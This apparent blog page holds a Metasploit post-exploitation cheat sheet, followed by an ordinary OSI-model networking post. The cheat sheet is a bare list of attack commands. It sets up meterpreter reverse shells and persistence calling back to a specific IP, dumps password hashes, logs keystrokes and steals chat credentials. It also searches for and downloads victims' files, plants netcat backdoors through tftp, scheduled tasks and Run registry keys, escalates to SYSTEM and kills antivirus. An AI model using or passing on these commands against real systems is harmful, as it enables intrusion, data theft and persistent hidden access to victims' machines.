Nexus: Cheat Sheet

Metasploit Cheatsheet

By 0x000216

Read

0 Comments

Metasploit Cheatsheet

Cheat sheet of Metasploit… Commands are as follows..

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST rmccurdy.com

set LPORT 21

set ExitOnSession false

# set AutoRunScript pathto script you want to autorun after exploit is run

set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z

# file_autopwn

rm -Rf /tmp/1

mkdir /tmp/1

rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR…s/nga10_02.pdf

./msfconsole

db_driver sqlite3

db_create pentest11

setg LHOST 75.139.158.51

setg LPORT 21

setg SRVPORT 21

setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf

set SSL true

set ExitOnSession false

set PAYLOAD windows/meterpreter/reverse_tcp

setg PAYLOAD windows/meterpreter/reverse_tcp

set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

run

# shows all the scripts

run

# persistence! broken …if you use DNS name ..

run persistence -r 75.139.158.51 -p 21 -A -X -i 30

run get_pidgin_creds

idletime

sysinfo

# SYSTEM SHELL ( pick a proc that is run by system )

migrate 376

shell

# session hijack tokens

use incognito

impersonate_token “NT AUTHORITY\\SYSTEM”

# escalate to system

use priv

getsystem

execute -f cmd.exe -H -c -i -t

execute -f cmd.exe -i -t

# list top used apps

run prefetchtool -x 20

# list installed apps

run prefetchtool -p

run get_local_subnets

# find and download files

run search_dwld “%USERPROFILE%\\my documents” passwd

run search_dwld “%USERPROFILE%\\desktop passwd

run search_dwld “%USERPROFILE%\\my documents” office

run search_dwld “%USERPROFILE%\\desktop” office

# alternate

download -r “%USERPROFILE%\\desktop” ~/

download -r “%USERPROFILE%\\my documents” ~/

# alternate to shell not SYSTEM

# execute -f cmd.exe -H -c -i -t

# does some run wmic commands etc

run winenum

# rev shell the hard way

run scheduleme -m 1 -u /tmp/nc.exe -o “-e cmd.exe -L -p 8080”

# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.

run schtasksabuse-dev -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4

run schtasksabuse -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4

# vnc / port fwd for linux

run vnc

# priv esc

run kitrap0d

run getgui

# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!

run killav

run winemun

run memdump

run screen_unlock

upload /tmp/system32.exe C:\\windows\\system32\\

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d “C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe”

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32

reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list

reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys

reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32

upload /neo/wallpaper1.bmp “C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\”

getuid

getpid

keyscan_start

keyscan_dump

migrate 520

portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80″

portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666

shell

run myremotefileserver_mserver -h

run myremotefileserver_mserver -p 8787

run msf_bind

run msf_bind -p 1975

rev2self

getuid

enumdesktops

grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump

run metsvc

run scraper

run checkvm

run keylogrecorder

run netenum -fl -hl localhostlist.txt -d google.com

run netenum -rl -r 10.192.0.50-10.192.0.254

run netenum -st -d google.com

run netenum -ps -r 10.192.0.50-254

# Windows Login Brute Force Meterpreter Script

run winbf -h

# upload a script or executable and run it

uploadexec

# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d “c:\windows\system32\metabkdr.exe” /f

at 19:00 /every:M,T,W,Th,F cmd /c start “%USERPROFILE%\metabkdr.exe”

SCHTASKS /Create /RU “SYSTEM” /SC MINUTE /MO 45 /TN FIREWALL /TR “%USERPROFILE%\metabkdr.exe” /ED 11/11/2011

# kill AV this will not unload it from mem it needs reboot or kill from memory still …

Darkspy, Seem, Icesword GUI can kill the tasks

catchme.exe -K “c:\Program Files\Kaspersky\avp.exe”

catchme.exe -E “c:\Program Files\Kaspersky\avp.exe”

catchme.exe -O “c:\Program Files\Kaspersky\avp.exe” dummy

Offsec

Read More Add comment

Linux Command Line - Cheat Sheet

By 0x000216

Read

0 Comments

Read More Add comment

OSI Layers – Please Do Not Tell Secret Passwords Anytime

By 0x000216

Read

0 Comments

I had an interesting day at work trying to figure out how best I can setup a service for a client who is sending UDP licensing traffic through some high-end networking devices over VPN. UDP by design is unreliable. This was causing issues as the UDP packet size was over the recommended size. The field size sets a theoretical limit of 65,535 bytes (8 byte header + 65,527 bytes of data) for a UDP data-gram. The practical limit for the data length which is imposed by the underlying IPv4 protocol is 65,507 bytes (65,535 − 8 byte UDP header − 20 byte IP header. Their packet was fragmenting and I had to go back to networking basics and start from Layer 2. Found the problem in Layer 4 (yes, it’s UDP fragmentation issue). I found the following OSI model explanation useful.

The OSI model breaks the network communications process into seven separate layers. I found few articles interesting and decided to splice them to create a post.

Layers 5 through 7 are generally referred to as the upper layers. Conversely, Layers 1 through 4 are collectively called the lower layers. Here are some mnemonic phrases to help you remember the layers of the OSI model:

“Please Do Not Throw Salami Pizza Away”
“All People Seem To Need Data Processing”
“Please Do Not Tell Secret Passwords Anytime”

From the top, or the layer closest to the user, down, these layers are:

Layer 1 – Physical: The Physical layer’s name says it all. This layer defines the electrical and physical specifications for the networking media that carry the data bits across a network.
Layer 2 – Data Link: As its name suggests, this layer is concerned with the linkages and mechanisms used to move data about the network, including the topology, such as Ethernet or Token Ring, and deals with the ways in which data is reliably transmitted.
Layer 3 – Network: This is the layer on which routing takes place, and, as a result, is perhaps the most important OSI layer. The Network layer defines the processes used to route data across the network and the structure and use of logical addressing.
Layer 4 – Transport: The functions defined in this layer provide for the reliable transmission of data segments, as well as the dis-assembly and assembly of the data before and after transmission.
Layer 5 – Session: The Session layer establishes, maintains, and manages the communication session between computers.
Layer 6 – Presentation: This layer is concerned with data representation and code formatting.
Layer 7 – Application: The Application layer provides services to the software through which the user requests network services. Your computer application software is not on the Application layer. This layer isn’t about applications and doesn’t contain any applications. In other words, programs such as Microsoft Word or Corel are not at this layer, but browsers, FTP clients, and mail clients are.

OSI Layer explained - Please Do Not Tell Secret Passwords Anytime - blackMORE Ops - 1

PDU Names on the Layers of the OSI Model

Each layer of the OSI model formats the data it receives to suit the functions to be performed on that layer. In general, the package of data that moves through the layers is called a Protocol Data Unit (PDU). However, as the data is reformatted and repackaged, it takes on unique names on certain layers. Table 1 lists the name each layer uses to refer to a message.

Absolutely memorize the information in Table 1 to the point that you can recite the data unit name associated with each of the OSI model’s layers.